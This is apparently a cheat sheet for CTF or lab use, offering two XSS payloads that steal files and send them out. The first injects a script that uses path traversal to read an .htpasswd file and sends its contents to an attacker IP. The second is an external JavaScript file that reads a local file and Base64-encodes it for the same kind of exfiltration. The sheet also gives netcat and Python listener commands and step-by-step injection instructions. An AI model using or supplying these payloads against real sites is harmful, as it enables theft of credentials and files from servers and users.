XSS File Stealing Cheat Sheet

1. Steal File Content Using Inline XSS Script (HTML)

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.14.228/?data=" + encodeURIComponent(data));
  })
  .catch(error => console.error("Error fetching the messages:", error));
</script>

Explanation:

• This script tries to read the .htpasswd file from a vulnerable server using a local file inclusion (LFI) or file read vulnerability in the URL parameter file.
• Then, it sends the stolen file content back to your attacker server (10.10.14.228) using an HTTP request with the data URL-encoded.
• Works in XSS vulnerable pages where you can inject JS.

How to use:

• Inject this script into an XSS vulnerable parameter or stored XSS vector.
• Make sure your attacker machine (10.10.14.228) is ready to receive GET requests and log the data parameter.
• Example listener (using nc or a simple Python HTTP server) to capture data:

nc -lvnp 80
# or
python3 -m http.server 80

2. External JS File to Steal File Content via XSS (JavaScript)

// Usage:
// Spawn python HTTP server on attacker box: python3 -m http.server 1212
// Inject in vulnerable page: <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script>

var url = "http://127.0.0.1/dir/pass.txt";   // Target file on victim
var attacker = "http://10.9.179.230:1212/steal_page_content_xss.js";

var xhr  = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        // send base64 encoded stolen content to attacker server
        fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
    }
}
xhr.open('GET', url, true);
xhr.send(null);

Explanation:

• This script fetches a local file on the victim machine (http://127.0.0.1/dir/pass.txt) via the victim’s browser.
• When the file is fully loaded (DONE), it encodes the content in Base64 (btoa) to safely transmit binary or special characters.
• Then sends this encoded content back to attacker server by requesting the script file with data as query string (?data=...).
• Requires you to host this script on your attacker machine (10.9.179.230) and have an HTTP server running on port 1212.

How to use:

• Start HTTP server on attacker box:

python3 -m http.server 1212

• Inject <script src="http://10.9.179.230:1212/steal_page_content_xss.js"></script> into an XSS vulnerable page.
• Monitor requests on your attacker server to capture the Base64 encoded file contents in the URL.
• Decode captured Base64 content:

echo "base64_encoded_string" | base64 -d > stolen_file.txt

Summary Notes:

• These methods depend on the target browser having access to local files via URL paths (like 127.0.0.1) or vulnerable parameters (LFI).
• Base64 encoding helps send files safely in GET requests.
• Must have control over attacker server to catch stolen data.
• Use during CTF challenges, penetration testing, or in controlled environments.
• Always check the same-origin policy and CORS restrictions which may block requests in real-world targets.